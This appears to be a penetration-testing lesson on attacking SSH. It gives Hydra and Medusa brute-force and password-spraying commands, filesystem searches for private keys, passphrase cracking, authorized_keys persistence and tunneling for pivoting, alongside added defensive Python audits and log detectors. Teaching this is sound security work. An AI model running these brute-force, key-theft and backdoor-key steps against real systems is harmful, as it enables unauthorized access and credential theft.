SSH Enumeration & Attacks

intermediate · 30 min · Writeup

Attacking SSH services and authentication

Learning Objectives

  • Enumerate SSH configurations
  • Perform SSH brute force attacks
  • Exploit SSH key misconfigurations
  • Understand SSH tunneling

SSH (Secure Shell) is like FTP's security-conscious younger sibling. It encrypts everything, requires authentication, and provides secure remote access. But "secure" doesn't mean "unbreakable" - weak passwords, key misconfigurations, and old versions still make SSH a juicy target.

Running on port 22 (usually), SSH is the standard way to remotely manage Linux/Unix servers. It can also tunnel other protocols, forward ports, and transfer files via SCP/SFTP. If you compromise SSH credentials, you often have direct shell access.

SSH vs Telnet

SSH replaced Telnet because Telnet sends everything in cleartext. If you see port 23 (Telnet) open, that's a finding on its own - and credentials can be sniffed.

SSH Enumeration

Banner Grabbing

bash
# Get SSH version
nc -nv 192.168.1.10 22
ssh -v user@192.168.1.10

# Nmap service detection
nmap -sV -p 22 192.168.1.10

# Detailed SSH info
nmap -p 22 --script ssh2-enum-algos,ssh-hostkey 192.168.1.10

The SSH banner reveals version information. Different versions have different vulnerabilities:

  • OpenSSH < 7.7: Username enumeration (CVE-2018-15473)
  • OpenSSH 2.3-4.7: Various vulnerabilities
  • Dropbear: Embedded device SSH - often outdated
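To apply the version list above across a whole fleet rather than one host, here is an added Python banner parser (not part of the original page) that reads the RFC 4253 identification line, extracts the OpenSSH version and flags the CVE-2018-15473 threshold; grab_banner() and the sample banners are illustrative assumptions.

```python
import re
import socket

# Version in which the username-enumeration bug (CVE-2018-15473) was fixed,
# as stated in the list above; used as the comparison threshold.
USERNAME_ENUM_FIXED_IN = (7, 7)

# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?: (?P<comment>.*))?$")
OPENSSH_RE = re.compile(r"^OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)")

def parse_ssh_banner(banner: str) -> dict:
    """Split a server identification line into protocol, software and comment."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        raise ValueError(f"not an SSH identification string: {banner!r}")
    info = m.groupdict()
    v = OPENSSH_RE.match(info["software"])
    info["openssh_version"] = (int(v["major"]), int(v["minor"])) if v else None
    return info

def assess_banner(banner: str) -> list:
    """Findings a defender would triage from the banner alone."""
    info = parse_ssh_banner(banner)
    findings = []
    if info["proto"] != "2.0":
        findings.append(f"protocol {info['proto']} advertised; only 2.0 should be offered")
    ver = info["openssh_version"]
    if ver is None and "dropbear" in info["software"].lower():
        findings.append(f"Dropbear ({info['software']}): embedded SSH, confirm firmware is current")
    elif ver is not None and ver < USERNAME_ENUM_FIXED_IN:
        findings.append(f"OpenSSH {ver[0]}.{ver[1]} < 7.7: username enumeration (CVE-2018-15473)")
    return findings

def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Read the server's identification line, i.e. what `nc -nv host 22` prints first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = b""
        while not data.endswith(b"\n") and len(data) < 255:  # RFC 4253 caps the line at 255 bytes
            chunk = s.recv(1)
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", errors="replace").strip()

if __name__ == "__main__":
    # Constructed sample banners; on a live host use grab_banner("192.168.1.10") instead.
    for b in ("SSH-2.0-OpenSSH_7.4", "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13", "SSH-2.0-dropbear_2019.78"):
        print(b, "->", assess_banner(b) or ["no banner-level findings"])
```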

Username Enumeration

Some SSH versions respond differently to valid vs invalid usernames, allowing enumeration without actual login attempts.

bash
# Check for user enumeration vulnerability
nmap -p 22 --script ssh-auth-methods 192.168.1.10

# Use ssh-audit for comprehensive analysis
ssh-audit 192.168.1.10

# Metasploit username enumeration
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.10
set USER_FILE /usr/share/wordlists/usernames.txt
run

Common Usernames

Always try: root, admin, user, test, guest, administrator, ubuntu, centos, ec2-user (AWS), azureuser (Azure), and any usernames found during OSINT.

SSH Brute Forcing

bash
# Hydra brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

# Limit threads (SSH often limits connections)
hydra -l root -P passwords.txt -t 4 ssh://192.168.1.10

# Medusa
medusa -h 192.168.1.10 -u root -P passwords.txt -M ssh

# Ncrack
ncrack -p 22 --user root -P passwords.txt 192.168.1.10

# Patator
patator ssh_login host=192.168.1.10 user=root password=FILE0 0=passwords.txt

Rate Limiting

Most SSH servers limit login attempts. Use fewer threads (-t 4 in Hydra) and consider using fail2ban bypass techniques if testing your own systems. Too aggressive = temporary IP ban.

Smart Brute Forcing

bash
# Password spraying (one pass, many users)
hydra -L users.txt -p "Summer2024!" ssh://192.168.1.10

# Common passwords to try first
# Password1, Welcome1, Company123, Season+Year
# username+123, username+!, username+@company

# Use custom wordlist based on OSINT
# Company name variations, employee names, locations
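On the receiving end of the hydra runs above, the rate-limiting note mentions fail2ban; the added Python below (not from the page) implements the same idea as a log check: it counts failures per source IP and user over constructed auth.log lines, flags both single-user brute force and one-password spraying, and ranks a success that follows failures as the alert to act on first.

```python
import re
from collections import defaultdict

# OpenSSH auth.log lines, e.g.
#   "Failed password for invalid user test from 10.0.0.5 port 41234 ssh2"
#   "Accepted publickey for deploy from 10.0.0.9 port 50022 ssh2: ED25519 SHA256:..."
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>[\d.]+)")

def detect_ssh_attacks(lines, fail_threshold=5, spray_users=3):
    """Return {source_ip: [findings]} for brute force, password spraying and success-after-failure.

    fail_threshold: failures from one IP against one user  (hydra -l root -P list ...)
    spray_users:    distinct users failed from one IP       (hydra -L users -p "Summer2024!" ...)
    """
    fails = defaultdict(lambda: defaultdict(int))  # ip -> user -> failure count
    accepted = defaultdict(set)                    # ip -> users with a later successful login
    for line in lines:
        if m := FAILED_RE.search(line):
            fails[m["ip"]][m["user"]] += 1
        elif m := ACCEPTED_RE.search(line):
            accepted[m["ip"]].add(m["user"])
    findings = {}
    for ip, per_user in fails.items():
        f = [f"brute force: {n} failures for {u}" for u, n in per_user.items() if n >= fail_threshold]
        if len(per_user) >= spray_users:
            f.append(f"password spray: {len(per_user)} distinct users tried")
        # A success from an IP that was guessing that user is the alert to act on first.
        f += [f"SUCCESS after failures: {u}" for u in sorted(accepted.get(ip, ())) if u in per_user]
        if f:
            findings[ip] = f
    return findings

# Constructed sample log lines (not real data): one brute-forcer that eventually
# succeeds, one sprayer, and one legitimate user who mistyped once.
SAMPLE_LOG = [
    f"Mar  3 10:00:{i:02d} host sshd[10{i}]: Failed password for root from 192.168.1.50 port 4000{i} ssh2"
    for i in range(6)
] + [
    "Mar  3 10:01:00 host sshd[1010]: Failed password for invalid user admin from 192.168.1.60 port 40100 ssh2",
    "Mar  3 10:01:01 host sshd[1011]: Failed password for invalid user test from 192.168.1.60 port 40101 ssh2",
    "Mar  3 10:01:02 host sshd[1012]: Failed password for ubuntu from 192.168.1.60 port 40102 ssh2",
    "Mar  3 10:02:00 host sshd[1020]: Accepted password for root from 192.168.1.50 port 40007 ssh2",
    "Mar  3 10:03:00 host sshd[1030]: Failed password for alice from 192.168.1.70 port 40200 ssh2",
]

if __name__ == "__main__":
    for ip, f in detect_ssh_attacks(SAMPLE_LOG).items():
        print(ip, f)
```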

SSH Key Attacks

Finding SSH Keys

Private keys are the holy grail. If you find one, you might not need a password at all.

bash
# Common private key locations
~/.ssh/id_rsa
~/.ssh/id_ed25519
~/.ssh/id_ecdsa
/root/.ssh/id_rsa
/etc/ssh/ssh_host_*_key
/home/*/.ssh/id_rsa

# Search for private keys
grep -r "BEGIN RSA PRIVATE KEY" /home/
grep -r "BEGIN OPENSSH PRIVATE KEY" /home/
find / -name "id_rsa" 2>/dev/null

# Look for keys in backups, web directories, git repos
find /var/www -name "*.pem" -o -name "*.key" 2>/dev/null

Using Found Keys

bash
# Set correct permissions
chmod 600 id_rsa

# Connect with key
ssh -i id_rsa user@192.168.1.10

# If key is encrypted, crack the passphrase
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Or with hashcat
hashcat -m 22931 hash.txt wordlist.txt

Authorized_keys Abuse

bash
# If you have write access to ~/.ssh/authorized_keys
# Generate your own key
ssh-keygen -t rsa -b 4096

# Add your public key
echo "ssh-rsa AAAA...your-key... attacker@kali" >> /home/user/.ssh/authorized_keys

# Now you can SSH in
ssh -i your_key user@192.168.1.10

Key File Permissions

SSH is picky about key file permissions. Private keys must be 600 (rw-------). If SSH complains about permissions, chmod 600 is your friend.
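As an added example (not from the page) for the owner's side of the key-hunting and permissions sections: this Python audit reads each private key's openssh-key-v1 header to tell passphrase-protected keys from bare ones (the ones ssh2john would not even be needed for) and checks the 0600 rule. make_openssh_key_blob() builds constructed header-only files for testing and is not a real key.

```python
import base64
import stat
import struct
from pathlib import Path

PEM_HEADERS = (b"-----BEGIN RSA PRIVATE KEY-----", b"-----BEGIN EC PRIVATE KEY-----", b"-----BEGIN DSA PRIVATE KEY-----")
OPENSSH_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"  # first bytes of the base64-decoded openssh-key-v1 blob

def key_cipher(data: bytes):
    """Return (is_private_key, cipher); cipher is 'none' when no passphrase protects the key."""
    if data.startswith(OPENSSH_HEADER):
        blob = base64.b64decode(b"".join(l for l in data.splitlines() if not l.startswith(b"-----")))
        if not blob.startswith(MAGIC):
            return True, "unparseable"
        # The ciphername is the first uint32-length-prefixed string after the magic.
        (n,) = struct.unpack(">I", blob[len(MAGIC):len(MAGIC) + 4])
        return True, blob[len(MAGIC) + 4:len(MAGIC) + 4 + n].decode()
    if data.startswith(PEM_HEADERS):  # legacy PEM keys flag encryption in a header line instead
        return True, "pem-encrypted" if b"Proc-Type: 4,ENCRYPTED" in data else "none"
    return False, None

def audit_key(data: bytes, mode: int):
    """Findings for a key's contents plus its permission bits (e.g. 0o644); None if not a key."""
    is_key, cipher = key_cipher(data)
    if not is_key:
        return None
    findings = []
    if mode & 0o077:
        findings.append(f"mode {mode:04o}: readable by group/other, should be 0600")
    if cipher == "none":
        findings.append("no passphrase: anyone who copies the file can use it")
    return findings

def scan_for_private_keys(root):
    """Walk root (the find/grep sweep above, run by the owner) and audit every key found."""
    results = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.stat().st_size < 65536:
            f = audit_key(p.read_bytes(), stat.S_IMODE(p.stat().st_mode))
            if f is not None:
                results[str(p)] = f
    return results

def make_openssh_key_blob(cipher: str) -> bytes:
    """Constructed header-only openssh-key-v1 file for testing; it is not a usable key."""
    s = lambda b: struct.pack(">I", len(b)) + b
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = MAGIC + s(cipher.encode()) + s(kdf) + s(b"") + struct.pack(">I", 1)
    return OPENSSH_HEADER + b"\n" + base64.b64encode(blob) + b"\n-----END OPENSSH PRIVATE KEY-----\n"
```

Run scan_for_private_keys("/home") or scan_for_private_keys("/var/www") as root to get the same sweep the find commands above perform, with a finding per key instead of a bare path list.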

SSH Tunneling

SSH tunneling lets you route traffic through SSH connections. Perfect for accessing internal services or pivoting through compromised hosts.

Local Port Forwarding

Access remote services as if they were local. "Bring remote port to me."

bash
# Forward remote port 3306 (MySQL) to local 3306
ssh -L 3306:localhost:3306 user@192.168.1.10

# Forward internal host through jump box
ssh -L 8080:internal-server:80 user@jump-box

# Now access MySQL locally
mysql -h 127.0.0.1 -u root -p

Remote Port Forwarding

Make your local services accessible on the remote server. "Send my port there."

bash
# Make your local port 4444 accessible on remote as 4444
ssh -R 4444:localhost:4444 user@192.168.1.10

# Useful for reverse shells through firewalls

Dynamic Port Forwarding (SOCKS Proxy)

Create a SOCKS proxy to route any traffic through SSH.

bash
# Create SOCKS proxy on local port 1080
ssh -D 1080 user@192.168.1.10

# Use with proxychains
proxychains nmap -sT 10.0.0.0/24

# Or configure browser to use SOCKS proxy
# localhost:1080

SSH Vulnerabilities

bash
# Comprehensive SSH audit
ssh-audit 192.168.1.10

# Check supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.10

# Check for known CVEs
searchsploit openssh
searchsploit ssh

Notable SSH Vulnerabilities

  • CVE-2018-15473: Username enumeration in OpenSSH < 7.7
  • CVE-2016-0777/0778: Roaming vulnerability (memory leak)
  • CVE-2020-15778: Command injection via scp
  • Weak algorithms: SHA1, MD5, CBC ciphers are deprecated

ssh-audit is Essential

ssh-audit checks for weak algorithms, vulnerable versions, and configuration issues. It's the fastest way to assess SSH security.
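Added example, not from the page or from ssh-audit itself: a small Python sshd_config audit covering the ground above and the tunneling section, flagging password and root login, MaxAuthTries, TCP forwarding and the deprecated CBC/MD5/SHA1 algorithm families. The default values are an assumption (OpenSSH 7.x or newer) and the two configs are constructed.

```python
import re

# OpenSSH defaults used when a keyword is absent (assumption: OpenSSH 7.x or newer).
DEFAULTS = {"passwordauthentication": "yes", "permitrootlogin": "prohibit-password", "maxauthtries": "6", "allowtcpforwarding": "yes"}
BAD_IF_YES = {"passwordauthentication": "brute force and spraying possible; prefer keys only",
              "permitrootlogin": "root is the first account every wordlist tries",
              "allowtcpforwarding": "any authenticated user can pivot with -L/-R/-D"}
# Algorithm families the list above calls deprecated: CBC ciphers, MD5/SHA1 MACs, SHA1 key exchange.
WEAK_ALGO = {"ciphers": re.compile(r"-cbc$|arcfour|3des", re.I),
             "macs": re.compile(r"md5|sha1", re.I),
             "kexalgorithms": re.compile(r"sha1$", re.I)}

def parse_sshd_config(text):
    """Return {lowercased keyword: value} for the global section; Match blocks are conditional and skipped."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(\S+?)(?:[ \t=]+(.*))?$", line)  # "Key value" or "Key=value"
        key, value = m[1].lower(), (m[2] or "").strip()
        if key == "match":
            break  # everything after the first Match line is conditional; audit the global section only
        cfg.setdefault(key, value)  # sshd honours the first occurrence of a keyword
    return cfg

def audit_sshd_config(text):
    """Findings a defender would raise against this sshd_config (same ground ssh-audit covers)."""
    cfg = {**DEFAULTS, **parse_sshd_config(text)}
    findings = [f"{k} yes: {why}" for k, why in BAD_IF_YES.items() if cfg[k].lower() == "yes"]
    if int(cfg["maxauthtries"]) > 3:
        findings.append(f"maxauthtries {cfg['maxauthtries']}: more guesses per connection than needed")
    for key, pattern in WEAK_ALGO.items():
        weak = [a for a in cfg.get(key, "").lstrip("+-^").split(",") if a and pattern.search(a)]
        if weak:
            findings.append(f"{key}: deprecated algorithms enabled: {', '.join(weak)}")
    return findings

# Constructed configs: a weak one next to its hardened counterpart.
WEAK_CONFIG = """PermitRootLogin yes
PasswordAuthentication yes
Ciphers aes128-cbc,aes256-ctr,3des-cbc
MACs hmac-md5,hmac-sha2-256
KexAlgorithms diffie-hellman-group1-sha1,curve25519-sha256
"""
HARDENED_CONFIG = """PermitRootLogin no
PasswordAuthentication no
MaxAuthTries 3
AllowTcpForwarding no
KexAlgorithms curve25519-sha256
"""
```

Feed it the real file with audit_sshd_config(open("/etc/ssh/sshd_config").read()); an empty list means none of the checks above fired.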

SSH Enumeration Methodology

SSH Enumeration Process

1. Banner Grab: Get version, identify potential vulnerabilities
2. User Enum: Test for username enumeration vulnerability
3. Key Search: Look for exposed private keys
4. Default Creds: Try common username/password combos
5. Brute Force: Careful password attacks with rate limiting
6. SSH Audit: Check for weak algorithms and CVEs
7. Tunneling: Use SSH for pivoting once authenticated

Knowledge Check


What port does SSH typically run on?

Challenges

SSH Key Hunt

Challenge · 🌱 beginner

Find an exposed SSH private key and use it to gain access to the server.


SSH Tunnel to Database

Challenge · 🔥 intermediate

Use SSH port forwarding to access an internal MySQL database that's not directly accessible.


Key Takeaways

  • SSH runs on port 22 and encrypts all traffic
  • Banner grabbing reveals version and potential vulnerabilities
  • Some SSH versions allow username enumeration
  • Finding private keys = instant access (check permissions!)
  • SSH tunneling enables pivoting and accessing internal services
  • Use ssh-audit for comprehensive security assessment
  • Brute force carefully - rate limiting is common